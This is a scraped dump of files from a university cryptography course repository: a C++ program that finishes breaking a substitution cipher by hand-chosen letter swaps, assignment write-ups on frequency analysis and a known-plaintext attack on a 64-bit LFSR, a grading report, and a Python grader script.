manual observations. \n\nclear.txt contains the orignal unencrypted plain text used to make ciphertext.txt.\n*/\n\n#include <iostream>\n#include <list>\n#include <fstream>\nusing namespace std;\n\nint main()\n{\n\tfstream infile, outfile;\n\tchar temp;\n\tinfile.open(\"cracked.txt\");\n\toutfile.open(\"clear.txt\", std::fstream::out | std::fstream::trunc);\n\ttemp=infile.get();\n\twhile(!infile.eof())\n\t{\n\n\t\t//these were chosen in no particular order.\n\t\tswitch(temp)\n\t\t{\n\t\t\tcase 'O':outfile <<'H';\n\t\t\t\tbreak;\n\t\t\tcase 'C':outfile <<'U';\n\t\t\t\tbreak;\n\t\t\tcase 'H':outfile <<'N';\n\t\t\t\tbreak;\n\t\t\tcase 'R':outfile <<'D';\n\t\t\t\tbreak; \n\t\t\tcase 'L':outfile <<'R';\n\t\t\t\tbreak; \n\t\t\tcase 'N':outfile <<'O';\n\t\t\t\tbreak; \n\t\t\tcase 'W':outfile <<'G';\n\t\t\t\tbreak; \n\t\t\tcase 'F':outfile <<'M';\n\t\t\t\tbreak; \n\t\t\tcase 'M': outfile <<'F';\n\t\t\t\tbreak; \n\t\t\tcase 'Y':outfile <<'P';\n\t\t\t\tbreak;\n\t\t\tcase 'P':outfile <<'B';\n\t\t\t\tbreak;\n\t\t\tcase 'K':outfile <<'V';\n\t\t\t\tbreak;\n\t\t\tcase 'U':outfile <<'C';\n\t\t\t\tbreak;\n\t\t\tcase 'G':outfile <<'W';\n\t\t\t\tbreak;\n\t\t\tcase 'D':outfile <<'L';\n\t\t\t\tbreak;\n\t\t\tcase 'B':outfile <<'Y';\n\t\t\t\tbreak;\n\t\t\tcase 'V':outfile <<'K';\n\t\t\t\tbreak;\n\t\t\tcase 'J':outfile <<'Z';\n\t\t\t\tbreak;\n\t\t\tcase 'Q':outfile <<'X';\n\t\t\t\tbreak;\n\t\t\tcase 'X':outfile <<'J';\n\t\t\t\tbreak;\n\t\t\tcase 'Z':outfile <<'Q';\n\t\t\t\tbreak;\n\t\t\tdefault: outfile << temp;\n\t\t\t\tbreak;\n\t\t\t\n\t\t}\n\t\ttemp=infile.get();\n\t}\n\tinfile.close();\n\toutfile.close();\n\treturn 0;\n\n}\n\n/*running list of characters that have been switched. there should be a case and a switch of each character listed here. 
characters with an x on the right have found a match \n\tO->H x definatly\n\tc->U x (definatly)\n\tH->N x (definatly)\n\tR->D x definatly\n\tL->R x\n\tN->O x\n\tW->G x\n\tF->M x (definitly)\n\tM->F x\n\tY->P x definatly\n\tP->B x definatly\n\tK->V x definatly\n\tU->C x\n\tG->W x definatly\n\tD->L x\n\tB->Y x\n\tV->K x definatly\n\tj->Z x Definatly\n\tQ->x x\n\tx->J x\n\tz->Q x\n\t\n*/\n" }, { "alpha_fraction": 0.7080299854278564, "alphanum_fraction": 0.7347604036331177, "avg_line_length": 41.19724655151367, "blob_id": "37b441cdea907be0cb41aead1e68ea241b462268", "content_id": "291a7c4b51b39775eee405a2293bf0991b773831", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9203, "license_type": "no_license", "max_line_length": 437, "num_lines": 218, "path": "/Project_2/project_2/description.md", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "# Cracking a LFSR stream cipher\n## Project 2\n### Due Th 10/5\n\n---\n\n#### Summary\nIn this project we will execute a known plaintext attack on a LFSR stream cipher.\n\nIn particular, we will crack an LFSR with degree $m=64$. Given will be a long ciphertext which is known to be the encryption of a book from Project Gutenberg. The first few bytes of works on Project Gutenberg are all very similar, which allows for a known plaintext attack. The target ciphertext is in this directory and has the name `target_ciphertext`.\n\nUsing known plaintext, we will recover $2m=128$ bits of keystream, and solve a system of linear equations to determine the tap bits $p_0,p_1,\\ldots,p_{63}$. If the basic idea of this plan is not clear to you, please read the section of the textbook on this topic (Chapter 2).\n\nIn order to do the attack you will first need to implement some parts of an LFSR. Then you will use Sage together with some known plaintext to produce the original state and tap variables used in the encryption of the target. 
Finally you will use your LFSR to decrypt the target and produce the solution.\n\n---\n\n#### `lfsr.c`\n\nI have prepared an outline of the code you need to write in the file called `lfsr.c` which you should find in this directory.\n\nThis program implements a 64 bit LFSR based on the C type `uint64_t`. You can think of variables of this type as 64 bit unsigned integers. We use one of these types to represent the state of the LFSR (i.e. $s_{m-1},s_{m-2},\\ldots,s_1,s_0$) and one to represent the tap bits (i.e. $p_{m-1},p_{m-2},\\ldots,p_1,p_0$).\n\nYou can compile and run this code from a terminal on cocalc with these commands:\n\n```\n~/project_2$ gcc lfsr.c\n~/project_2$ ./a.out\n```\n\nOptionally you could use the `clang` compiler rather than `gcc`; generally `clang` has more helpful error messages than `gcc`.\n\nThe output is a file called `ct.dat`. Right now it is identical to the plaintext input, namely `toy_pt.txt`. After you implement the missing functions in `lfsr.c`, the output should be identical to the data in the file `ct.toy`. You can check whether they agree from a cocalc terminal with this command:\n\n```\n~/project_2$ diff ct.dat ct.toy\n```\n\nIf there is no output, then you have successfully implemented your LFSR. If there is output saying that the files differ, then your LFSR does not yet work correctly. By confirming that `ct.dat` and `ct.toy` agree, you can be confident that your LFSR works before moving on to other parts of the project.\n\nWe will say more below about the missing functions which you need to implement, after we introduce the basic datatypes used to implement our 64 bit LFSR.\n\n---\n\nThe code in `lfsr.c` represents a 64 bit LFSR in the following way. The 64 bits of both the state bits and the taps are represented using the `uint64_t`, which is a 64 bit integer type. The least significant bits of a `uint64_t` correspond to the small indexes for $s_i$ and $p_i$. 
For example, the binary number (expressed in hex)\n\n```\nuint64_t state = 0x0000000000000005\n```\n\nwould indicate that $s_0=1$, $s_1 = 0$, $s_2 = 1$, and $s_i = 0$ when $i \\notin \\{0,1,2\\}$.\n\nSimilarly the binary number (expressed in hex)\n\n```\nuint64_t taps = 0x60000000000000001\n```\n\nindicates that $p_0=1$, $p_{62}=p_{61}=1$ and $p_i = 0$ when $i \\notin \\{0,61,62\\}$.\n\n\n\nMost of the code you need to implement an LFSR has already been written. There are a few crucial functions left for you to write, which will be described in detail below.\n\n\n\nThe LFSR L is a struct type defined in the file as follows:\n\n```\ntypedef struct {\n\tuint64_t state;\n\tuint64_t taps;\n} LFSR;\n```\n\nThus L has two fields, which are both 64 bit integers. These represent the variables $s_{m-1},s_{m-2},\\ldots,s_1,s_0$ and $p_{m-1},p_{m-2},\\ldots,p_1,p_0$ as described above.\n\nCurrently the `main()` function has this code:\n\n```\nint main()\n{\n\tLFSR L;\n\tuint64_t initial_state = 0xbeefcafebabecab1;\n\tuint64_t taps = 0xdeaddeedacedface;\n\tinit_LFSR(&L,initial_state,taps);\n\tencrypt(\"toy_pt.txt\",\"ct.txt\",&L);\n\tinit_LFSR(&L,initial_state,taps);\n\tdecrypt(\"ct.txt\",\"toy_ot.txt\",&L);\n\t//get_128_keystream_bits(\"target_ciphertext\",\"<you fill this in>\");\n\t//shape_keystream();\n}\n```\n\nThe first four lines of this function declare and initialize the state and tap variables of the LFSR. Right now these are initialized with sample values. In the course of decrypting `target_ciphertext`, you will determine the settings used to produce the keystream that encrypted that ciphertext.\n\nThe last two lines in this file are commented out, but you should comment them back in as you fill in the functions necessary for them to run. We will describe these functions in detail below.\n\n\nThe code currently in `lfsr.c` should compile and run. 
There is a chance that there will be problems if the code is compiled on Visual Studio because GNU builtin commands are used in the `parity()` function in `lfsr.c`.\n\n[This](https://stackoverflow.com/questions/43883473/working-inline-assembly-in-c-for-bit-parity) version of the partity function should work on Windows:\n\n```\nint parity(uint64_t n){\n/*For use on non-GNU compilers*/\n/*Downloaded from https://stackoverflow.com/questions/43883473/working-inline-assembly-in-c-for-bit-parity*/\n n ^= n >> 1;\n n ^= n >> 2;\n n = (n & 0x1111111111111111) * 0x1111111111111111;\n return (n >> 60) & 1;\n}\n```\nYou can comment out the provided parity function and replace it with the above if you prefer not to work in GNU.\n\n---\n\n### Completing the LFSR\n\nTo complete the code in `lfsr.c` and produce a working LFSR you need to write two functions. These are the `read_lfsr` and `next_state` functions shown below.\n\n```\nint read_lfsr(LFSR* L)\n{\n/*Return the current output bit (the rightmost bit of the state variable) */\n\n\n/* You implement this*/\n\n return 0; // remove this line when you properly implement the function.\n\n}\n\nvoid next_state(LFSR* L)\n{\n/*Takes LFSR.\n Returns nothing.\n Side effect: advances L to next state.(shift to the right and replace leftmost bit with appropriate value)\n*/\n\n /* You implement this.\n Hint: make use of the parity() function provided above*/\n\n}\n```\nAs described in the comments, the `read_lfsr` function should return the rightmost bit of the LFSR `state` variable. Note that `L` is passed as a pointer, so the `state` field must be accessed as `L->state` not `L.state`.\n\nThe `next_state` function updates the state of the LFSR according to the value of the tap bits. The simplest way to do this is to AND the state and taps variables, and then return the parity of the result. 
This works because AND is coordinate-wise multiplication modulo 2, and parity is a summation of bits modulo 2.\n\nAs discussed above, you can check the correctness of your code by comparing `ct.dat` and `ct.toy`.\n\nWhen you have a working LFSR, you can use it to decrypt `target_ciphertext` as soon as you know the initial state and tap settings used to produce that ciphertext.\n\n---\n\n### Recovering the state and tap variables\n\nIn order to recover the state and tap settings used to encrypt `target_ciphertext`, we must first use a known-plaintext attack to recover the initial state, $s_0,s_1,\\ldots,s_{63}$.\n\nTo do this, complete the function `get_128_keystream_bits`, described below.\n\n```\nvoid get_128_keystream_bits(char* ct,char* kpt)\n{\n/*This function takes 16 bytes of ciphertext and 16 bytes of\n known plaintext.\n The output is a file named \"key_stream.txt\" that contains 128 bits\n of keystream. The stream is represented in ASCII, with 128 lines, and\n either a \"0\" or a \"1\" on each line. */\n\n/*This is the plaintext attack in which you recover 2m keystream bits.\n\n You implement this.\n*/\n\n}\n```\nAs discussed in the book, a known plaintext attack works by XORing the known plaintext with the ciphertext (in this case `target_ciphertext`). This exposes a certain amount of the keystream. Because the period of the LFSR is 64, you need $2\\cdot64/8 = 16$ bytes of keystream. For your 16 bytes of known plaintext, you might want to investigate what the first 16 characters tend to be for books posted as plaintext on Project Gutenberg.\n\nOnce you have the first 8 bytes of keystream, you know the initial state of the LFSR, and you can fill in this value back in `main()`.\n\nThat is, change\n\n```\n\tuint64_t initial_state = 0xbeefcafebabecab1;\n```\n\nto\n\n```\n\tuint64_t initial_state = 0xZZZZZZZZZZZZZZZZ;\n```\nwhere `0xZZZZZZZZZZZZZZZZ` is the initial state expressed in hex. 
Recall that $s_0$ goes in the rightmost bit, and $s_{63}$ goes in the leftmost bit.\n\nAll that remains to be done is to recover the inital taps.\n\n---\n\n### Recovering the taps\n\nThis task is outlined in detail in the file `matrix.sagews` in this folder. Please read this document.\n\n### Grading:\n\nIn order to grade this project I will be testing the following:\n\n1. Does \"read_lfsr\" work\n2. Does \"next_state\" work\n3. Does \"get_128_keystream_bits\" work\n4. Does \"shape_keystream\" work\n5. Did you decrypt `target_ciphertext`.\n\nThere are many opportunities for partial credit.\nPlease begin early and post questions on Piazza or ask them in class.\n\n### Submission:\n\nPlease simply leave your files in the `project_2` folder and they will be automatically collected. \n\n\n" }, { "alpha_fraction": 0.7033168077468872, "alphanum_fraction": 0.7160268425941467, "avg_line_length": 63.17318344116211, "blob_id": "d35eb8008a5ecc7234ff8bc1f21bb034fd1684ea", "content_id": "97e8da2532e3d76e3ae7e3827de622c139567df4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11487, "license_type": "no_license", "max_line_length": 3440, "num_lines": 179, "path": "/Project_1/description.md", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "# Project 1\n## Historical cryptography\n\nThe goal of this project is to break a substitution cipher. A [substitution cipher](https://en.wikipedia.org/wiki/Substitution_cipher) is a cipher in which a plaintext is converted character by character into ciphertext by using a predetermined rule of association. For example, the Caesar cipher is a special kind of substitution cipher in which\n\n$A \\rightarrow D$, $B \\rightarrow E$, $C \\rightarrow F$, etc.\n\nThe Caesar cipher has a very simple form, because each character is simply advanced three places to form the ciphertext. 
However, in general, the rule can be more complicated.\n\nThe following text is given in the file called `ciphertext.txt` in the assignment folder.\n\n```\n<X%Z|*aZXcWZa%c[R>Z[%csX%WZ<X%Z+%[PWPcaZcaWZXP|Z|sL[sXPa\\Z[c>|Zi%RRZi*RRZLaZ<X%Z[Ls.|Z4XPsXZ|%%+%WZ<X%+|%Ry%|Z|%a|POR%ZLiZ<X%ZX%c<Z<XL*|caW|ZLiZ\\[c||XL77%[|ZXPWW%aZPaZ<X%ZO*|X%|ZsXP[7%WZ4P<XZcZ+LaL<LaL*|ZcaWZW*RRZaL<%Z<X%ZR%cy%|ZLiZ<X%Z+>[<R%ZcaWZLRPy%Z<[%%|Z4cy%WZcaWZ[*|<R%WZPaZ<X%Z4PaWZc<Z%y%[>Z|<%7Z<Xc<Z%W+LaWZ<LL.ZX%ZWP|<*[O%WZ<X%ZRPoc[W|Z\\RP<<%[Pa\\Z4P<XZ<X%ZX*%|ZLiZ<X%Z%+%[cRWZcic[ZLiiZX%Z|c4Z<X%Z4PRWZ\\Lc<|ZOL*aWPa\\Zi[L+Zs[c\\Z<LZs[c\\ZPaZcZ4L[WZ<X%ZP|RcaWZ4c|ZPaXcOP<%WZ>%<Z%W+LaWZi%R<ZXP+|%RiZcRLa%Z\\*PW%WZO>Z<X%ZXcaWZLiZ\\LWX%Zi%R<ZcaZPaW%|s[POcOR%Z|%a|c<PLaZ|L+%4Xc<Zc.PaZ<LZW[%cW<Xc<ZW[%cWZLiZ<X%ZWc>RP\\X<Z4XPsXZ%y%aZPaZ<X%ZW%|%[<Z+c.%|Z*|Zi%c[Z4%Zc[%Z4c<sX%WZcaWZLO|%[y%WZ<XP|Zi%%RPa\\Z4c|Z|LZ|<[La\\Z<Xc<Zc<Z<X%Z+L+%a<Z4X%aZ%W+LaWZ4c|ZcOL*<Z<LZO%\\PaZXP|ZRcOL[ZX%Z|<L77%WZRcPWZWL4aZXP|Z7Ps.c6%Z|%Po%WZXP|Z\\*aZ+L*a<%WZ<LZ<X%Z|*++P<ZLiZ<X%ZXP\\X%|<Z[Ls.ZcaWZi[L+Z<X%as%Z\\co%WZ[L*aWZPaZ%y%[>ZWP[%s<PLaO*<ZP<Z4c|ZaL<Z*7LaZsL[|PscZ<X%Zy%[>ZXL*|%|ZLiZ4XPsXZX%ZsL*RWZWP|<Pa\\*P|XZL[ZLaZ|c[WPaPcZL[ZLaZ<X%ZP|RcaWZLiZ%ROcZ4P<XZP<|ZXP|<L[PscRZc||LsPc<PLa|ZL[Z*7LaZ<X%ZcR+L|<ZP+7%[s%7<POR%ZRPa%Z<Xc<Z<LZ<X%Z%67%[P%as%WZ%>%ZLiZcZ|cPRL[ZcRLa%Z[%y%cR%WZ<X%ZsLc|<ZLiZ\\%aLcZ<X%Z7[L*WZcaWZR%\\XL[aZ<X%ZsL++%[sPcRZ<Xc<ZX%Z\\co%WZP<Z4c|Zc<Z<X%ZO[P\\ca<Pa%Z<Xc<ZXcWZR%i<ZPaZ<X%Z+L[aPa\\ZcaWZ<X%Z<c[<caZ<Xc<ZXcWZ:*|<Z|%<Z|cPRZ<Xc<Z%W+LaWZiP6%WZXP|Z%>%|<X%ZiP[|<Z4c|Z:*|<ZWP|c77%c[Pa\\ZPaZ<X%Z|<[cP<|ZLiZOLaPicsPLZ<X%ZL<X%[ZiLRRL4Pa\\ZcaZL77L|P<%ZWP[%s<PLaZ4c|ZcOL*<Z<LZ[L*aWZ<X%ZP|RcaWZLiZsL[|Psc<XP|Z|P\\X<Z[%c||*[%WZXP+ZX%Z<X%aZRLL.%WZc<Z<X%ZLO:%s<|Za%c[ZXP+ZX%Z|c4Z<Xc<ZX%Z4c|ZLaZ<X%ZXP\\X%|<Z7LPa<ZLiZ<X%ZP|RcaWcZ|<c<*%ZLaZ<XP|Zyc|<Z7%W%|<cRZLiZ\\[caP<%ZaL<XPa\\ZX*+caZc77%c[Pa\\ZPaZ|P\\X<Z4XPR%Z<X%ZOR*%ZLs%caZO%c<Zc\\cPa|<Z<X%ZOc|%ZLiZ<X%ZP|RcaWZcaWZsLy%[%WZP<Z4P<XZcZi[Pa\\%ZLiZiLc+Z<X%aZX%ZW%|s%aW%WZ4P<XZsc*<PL*|ZcaWZ|RL4Z|<%7ZiL
[ZX%ZW[%cW%WZR%|<ZcaZcssPW%a<Z|P+PRc[Z<LZ<Xc<ZX%ZXcWZ|LZcW[LP<R>Zi%P\\a%WZ|XL*RWZXc77%aZPaZ[%cRP<>Wca<|Zc|Z4%ZXcy%Z|cPWZXcWZ<[cs%WZ<X%Z+c[.|ZcRLa\\Z<X%Z[Ls.|ZcaWZX%ZXcWZaL<Ps%WZ<Xc<Z<X%>ZR%WZ<LZcZ|+cRRZs[%%.Z4XPsXZ4c|ZXPWW%aZRP.%Z<X%ZOc<XZLiZ|L+%ZcasP%a<Za>+7XZ<XP|Zs[%%.Z4c|Z|*iiPsP%a<R>Z4PW%Zc<ZP<|Z+L*<XZcaWZW%%7ZPaZ<X%Zs%a<[%Z<LZcW+P<ZLiZ<X%Z%a<[cas%ZLiZcZ|+cRRZy%||%RZLiZ<X%ZR*\\\\%[ZsRc||Z4XPsXZ4L*RWZO%Z7%[i%s<R>ZsLas%cR%WZi[L+ZLO|%[yc<PLa<X%aZiLRRL4Pa\\Z<X%ZsR%4Z<Xc<ZPaZ<X%ZXcaW|ZLiZ<X%ZcOOZic[PcZXcWZO%%aZ|LZ|.PRi*RR>Z*|%WZ<LZ\\*PW%ZXP+Z<X[L*\\XZ<X%ZWWcRPcaZRcO>[Pa<XZLiZ7[LOcOPRP<P%|ZX%Z<XL*\\X<Z<Xc<Z<X%Zsc[WPacRZ|7cWcZca6PL*|ZaL<Z<LZO%Z4c<sX%WZXcWZ%a<%[%WZ<X%Zs[%%.ZsLas%cR%WZXP|ZRP<<R%ZOc[C*%ZiLRRL4%WZ<X%ZRPa%Z+c[.%WZO>Z<X%ZaL<sX%|ZPaZ<X%Z[Ls.ZcaWZc<Z<X%Z%aWZLiZP<ZXcWZO*[P%WZXP|Z<[%c|*[%ZP<Z4c|Z<XP|ZPW%cZ<Xc<ZXcWZO[L*\\X<ZWca<|ZOcs.Z<LZ<X%ZsP[s*Rc[Z[Ls.ZLa%Z<XPa\\ZLaR>Z7%[7R%6%WZ%W+LaWZcaWZW%|<[L>%WZXP|Z<X%L[>ZXL4ZsL*RWZ<XP|Z[Ls.Z4XPsXZ4%P\\X%WZ|%y%[cRZ<La|ZXcy%ZO%%aZRPi<%WZ<LZ<XP|Z|7L<Z4P<XL*<Z<X%ZcPWZLiZ+ca>Z+%a|*WW%aR>ZcaZPW%cZiRc|X%WZcs[L||ZXP|Z+PaWZPa|<%cWZLiZ[cP|Pa\\ZP<Z<XL*\\X<ZX%Z<X%>ZXcy%ZRL4%[%WZP<ZcaWZX%Z|7[ca\\Zi[L+Z<X%Z[Ls.ZPaZL[W%[Z<LZPa|7%s<Z<X%ZOc|%ZLaZ4XPsXZP<ZXcWZiL[+%[R>Z|<LLWX%Z|LLaZ7%[s%Py%WZ<Xc<ZcZ|RL7%ZXcWZO%%aZiL[+%WZcaWZ<X%Z[Ls.ZXcWZ|RPWZcRLa\\Z<XP|Z*a<PRZP<Z|<L77%WZc<Z<X%Z|7L<ZP<ZaL4ZLss*7P%WZcZRc[\\%Z|<La%ZXcWZ|%[y%WZc|ZcZ4%W\\%ZiRPa<|ZcaWZ7%OOR%|ZXcWZO%%aZPa|%[<%WZc[L*aWZP<Z|LZc|Z<LZsLas%cRZ<X%ZL[PiPs%Z<XP|Z|7%sP%|ZLiZ+c|La[>ZXcWZO%%aZsLy%[%WZ4P<XZ%c[<XZcaWZ\\[c||ZcaWZ4%%W|ZXcWZ\\[L4aZ<X%[%Z+L||ZXcWZsR*a\\Z<LZ<X%Z|<La%|Z+>[<R%O*|X%|ZXcWZ<c.%aZ[LL<ZcaWZ<X%ZLRWZ[Ls.Z|%%+%WZiP6%WZ<LZ<X%Z%c[<X\n```\n\nThis ciphertext was produced in the following way:\n\n1. A plaintext was chosen consisting only of uppercase alphabetical characters and the space character.\n2. 
A mapping was chosen at random from the ASCII characters {' ','A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'} into all printable ASCII characters.\n3. Each plaintext character was replaced by its image character under the mapping.\n\nIn case this is confusing, the following simplified example may be helpful. Suppose that the plaintext is \"WHAT ARE YOU SAYING\". We pick a rule of association that maps the plaintext characters to ciphertext characters in the following way:\n\n$A \\rightarrow X$\n\n$B \\rightarrow E$\n\n$C \\rightarrow v$\n\n$D \\rightarrow \\&$\n\n$E \\rightarrow r$\n\n$F \\rightarrow z$\n\n$G \\rightarrow @$\n\n$H \\rightarrow 6$\n\n$I \\rightarrow \\backslash$\n\n$J \\rightarrow 8$\n\n$K \\rightarrow 5$\n\n$L \\rightarrow e$\n\n$M \\rightarrow :$\n\n$N \\rightarrow I$\n\n$O \\rightarrow D$\n\n$P \\rightarrow )$\n\n$Q \\rightarrow Y$\n\n$R \\rightarrow L$\n\n$S \\rightarrow Q$\n\n$T \\rightarrow +$\n\n$U \\rightarrow ``$\n\n$V \\rightarrow \\_$\n\n$W \\rightarrow n$\n\n$X \\rightarrow b$\n\n$Y \\rightarrow \\#$\n\n$Z \\rightarrow <$\n\n$space \\rightarrow \\hat{ }$\n\nThen, under this rule,\n\nENC(\"WHAT ARE YOU SAYING\") = \"`n6X+^XLr^#D\"^QX#\\I@`\"\n\nwhere ENC denotes encryption. You may want to confirm that the first few letters are consistent with the mapping shown above. For instance, it is indeed true that W maps to n, H maps to 6, etc.\n\nThe embedding used in the simple example is not the same embedding that was used to produce the long ciphertext given at the beginning of this project description. Your job is to recover that embedding as well as the unknown plaintext.\n\n---\n\n### Requirements\n\nYour code should meet the following requirements.\n\n1. You can use any of the acceptable programming languages we discussed in class.\n1. Your code must read in input from a file. In other words, you must read in the ciphertext from the file ciphertext.txt. 
Do not hard code it as a string literal. This is essential because I will test your code on other ciphertexts.\n1. Whatever language you choose, the basename of your solution should be \"sol\". For example, if you use C call your solution `sol.c`, if you use Java then call your solution `sol.java`.\n1. You are free to work in your own IDE, but I would prefer it if you could ensure that all paths are relative, so that the same code works unchanged on cocalc.\n\nIf you would like information about how to compile your code from the command line on cocalc, I would be happy to assist you.\n\n### Input/Output Conditions\n\n#### Corpus cleaner\n\nPlease create a program called `sol_cleaner.ext`, where `ext` denotes the file extension corresponding to your choice of programming language (.py, .c, .cpp, .c++, or .java).\n\nThis program should open and read in a file named `corpus.txt`. This file should be a large body of work written in English (such as one of the [books freely downloadable from Project Gutenberg](https://www.gutenberg.org/files/2600/2600-0.txt)).\n\nAs output, the program should produce a new file called `corpus_clean.txt` which is similar to the input, except that:\n\n* All characters that are not spaces or alphabetical characters have been filtered out.\n* All alphabetical characters have been capitalized.\n\n\n#### Statistics analyzer (plaintext):\n\nPlease create a program called `sol_sap.ext`, where `ext` denotes the file extension corresponding to your choice of programming language (.py, .c, .cpp, .c++, or .java).\n\nThis program should open and read in a file named `corpus_clean.txt`, which is the output from `sol_cleaner.ext`. As output it should produce a file called `corpus_freq.txt`, which contains the following. Each row is a pair\n\n```\n<letter>, <rel_freq>\n```\nwhere `letter` is a character occurring in the text and `rel_freq` is the relative frequency of the letter in the corpus. 
The relative frequency of a letter `c` is defined by:\n\n$$relative\\, frequency\\, of\\, c = \\frac{\\#\\,occurrences\\, of\\, c\\, in\\, corpus}{\\#\\, letters\\, in\\, corpus}$$\n\nNote that this will be a floating point number.\n\nThe letter/frequency pairs should be given in order of descending frequency. For example, the file should roughly look like this.\n\n```\ne, 0.082198\na, 0.050031\n(etc)\nz, 0.003000\n\n```\nI have made up the values in the above table for the sake of example.\n\nIt is possible to implement this algorithm in a way that only makes one pass over the corpus. However, if you prefer to read through the file 27 times, that is feasible.\n\n#### Statistics analyzer (ciphertext)\n\nPlease create a program called `sol_sac.ext`, where `ext` denotes the file extension corresponding to your choice of programming language (.py, .c, .cpp, .c++, or .java).\n\nThis program should read in the file `ciphertext.txt`. The output should be a file `cipher_freq.txt` which is much like `corpus_freq.txt`, but with ciphertext characters rather than only letters and spaces.\nThis is very similar to the statistical analyzer for the corpus, and you should be able to reuse the code you have from the previous task with very few changes. In fact there is a way to arrange things so that this program is identical to `sol_sap.ext`. (But please hand in two files to make the grading uniform.)\n\n#### Cipher cracker\n\nPlease create a program called `sol_cracker.ext`, where `ext` denotes the file extension corresponding to your choice of programming language (.py, .c, .cpp, .c++, or .java).\n\nThis program reads in three files: `ciphertext.txt`, `cipher_freq.txt`, and `corpus_freq.txt`.\n\nThe output of this program should be a file called `cracked.txt`. It should be the result of replacing each charact of ciphertext.txt with a capital Roman letter or a space. The correspondnce is given by the files `cipher_freq.txt` and `corpus_freq.txt`. 
The character in row $i$ of `cipher_freq.txt` should be replaced with the letter (or space) in row $i$ of `corpus_freq.txt`. (Note that for this to work, both `cipher_freq.txt` and `corpus_freq.txt` must be sorted by frequency.)\n\nThe result will probably not be a perfect decrypt, but the output should be close enough to cleartext to repair the remaining problems manually.\n\n#### Manual corrections (optional)\n\nIn this optional part of the project, you should create a file called `sol_corrections.ext`, where `ext` denotes the file extension corresponding to your choice of programming language (.py, .c, .cpp, .c++, or .java).\n\nThis program should read the file `cracked.txt` as input and output a file called `clear.txt`. The output should be the original plaintext used to produce the ciphertext.\n\nThis program works by making letter substitutions in `cracked.txt` that you observe to be appropriate, treating the remaining work to be done as a recreational [cryptogram](https://en.wikipedia.org/wiki/Cryptogram).\n\n\n---\n\n#### Reports\n\nIn this directory you will see a script called `test.py`. I will use this script, or something like it, to help grade your code. You can execute it from the command line like this:\n\n```\n$ python test.py\n```\n\nDo not type the `$`, that is only in the above to show where the command prompt is. 
Please let me know if you get strange results.\n\nThe script will produce a file called `Pr\n" }, { "alpha_fraction": 0.6797752976417542, "alphanum_fraction": 0.6853932738304138, "avg_line_length": 11.714285850524902, "blob_id": "08eed13ff7f4ef142dab4aa0c0cd64d2d54812f0", "content_id": "2370dfce45a7263728c1750ab37ea37a91b500fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 178, "license_type": "no_license", "max_line_length": 26, "num_lines": 14, "path": "/Project_1/Final_Files/Project 1.report.md", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "# Assignment Project 1\n\n\n Searching for files: \n\n```\nsol_cleaner found: True\nsol_sap found: True\nsol_sac found: True\nsol_cracker found: True\n``` \n\n---\n### Examining sol_cleaner.\n" }, { "alpha_fraction": 0.6083175539970398, "alphanum_fraction": 0.6124763488769531, "avg_line_length": 32.0625, "blob_id": "7ce08d57fbb640a02a837891b6ea52ab76581a83", "content_id": "d650cf059e12c3b8c8eec27a7622118b42f11422", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2645, "license_type": "no_license", "max_line_length": 141, "num_lines": 80, "path": "/Project_1/Final_Files/test.py", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "import os\n\n\ndef run_c(filename):\n import subprocess\n name,ext = os.path.splitext(filename)\n try:\n assert(ext in ['.c','.cpp','.c++'])\n except:\n print \"Unrecognized extension. File must be .c, .cpp, or .c++. 
Other filetypes may be supported soon if demand exists.\"\n raise SystemExit(0)\n compiler = \"g++\"\n if ext=='.c':\n compiler = \"gcc\"\n proc = subprocess.Popen(\"/usr/bin/%s %s -lcrypto -lpthread\"%(compiler,filename),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n proc.wait()\n out,err = proc.communicate()\n if err:\n #print repr(err)\n return False,False,repr(err)\n ok = True\n try:\n out = subprocess.check_output(\"./a.out\",shell=True,stderr=subprocess.PIPE)\n except:\n ok = False\n\n return True,ok,out\n\n\n\nimport os\nroot = \"./\"\nassignment = \"Project 1\"\nreport = open(assignment+\".report.md\",\"w\")\npath = root\nfiles = os.listdir(path)\n\nreport.write(\"# Assignment %s\\n\"%assignment)\nreport.write(\"\\n\\n Searching for files: \\n\\n```\\n\")\nbasenames = [\"sol_cleaner\", \"sol_sap\", \"sol_sac\",\"sol_cracker\"]\nfullnames = dict()\nfound_basenames = [False]*len(basenames)\nfor i,n in enumerate(basenames):\n foundling = [f for f in files if f.find(n)==0]\n exists = len(foundling)==1\n found_basenames[i] = exists\n report.write(\"%s found: %s\\n\"%(n,exists))\n if exists:\n fullnames[n]=foundling[0]\n else:\n fullnames[n]=False\nreport.write(\"``` \\n\")\nfor i,n in enumerate(basenames):\n report.write(\"\\n---\\n### Examining %s.\\n\"%basenames[i])\n if found_basenames[i]==False:\n report.write(\"File not found\\n\")\n continue\n before_files = set(os.listdir(path))\n btimes = [os.path.getmtime(path+bf) for bf in sorted(before_files)]\n (compiles,runs,output) = run_c(fullnames[n])\n after_files = set(os.listdir(path))\n atimes = [os.path.getmtime(path+bf) for bf in sorted(before_files)]\n\n modified = [sorted(before_files)[i] for i in range(len(btimes)) if atimes[i]!=btimes[i]]\n modified.remove(\"a.out\")\n new_files = list(after_files.difference(before_files))\n report.write(\"Compiles: %s\\n\\n\"%compiles)\n report.write(\"Runs: %s\\n\\n\"%runs)\n report.write(\"Terminal Output: %s\\n\\n\"%output)\n report.write(\"Produced 
files: \"+\", \".join(new_files)+\"\\n\\n\")\n report.write(\"Modified files: \"+ \", \".join(modified)+\"\\n\\n\")\n for m in modified:\n f = open(m,\"r\").readlines()\n report.write(\"Excerpt of %s:\\n\\n```\\n\\n\"%m)\n if len(f)==1:\n report.write(f[0][:80])\n else:\n report.writelines(f[:10])\n report.write(\"\\n```\\n\\n---\\n\")\nreport.close()\n" } ]
18
l-yc/codeforces-scrapper
https://github.com/l-yc/codeforces-scrapper
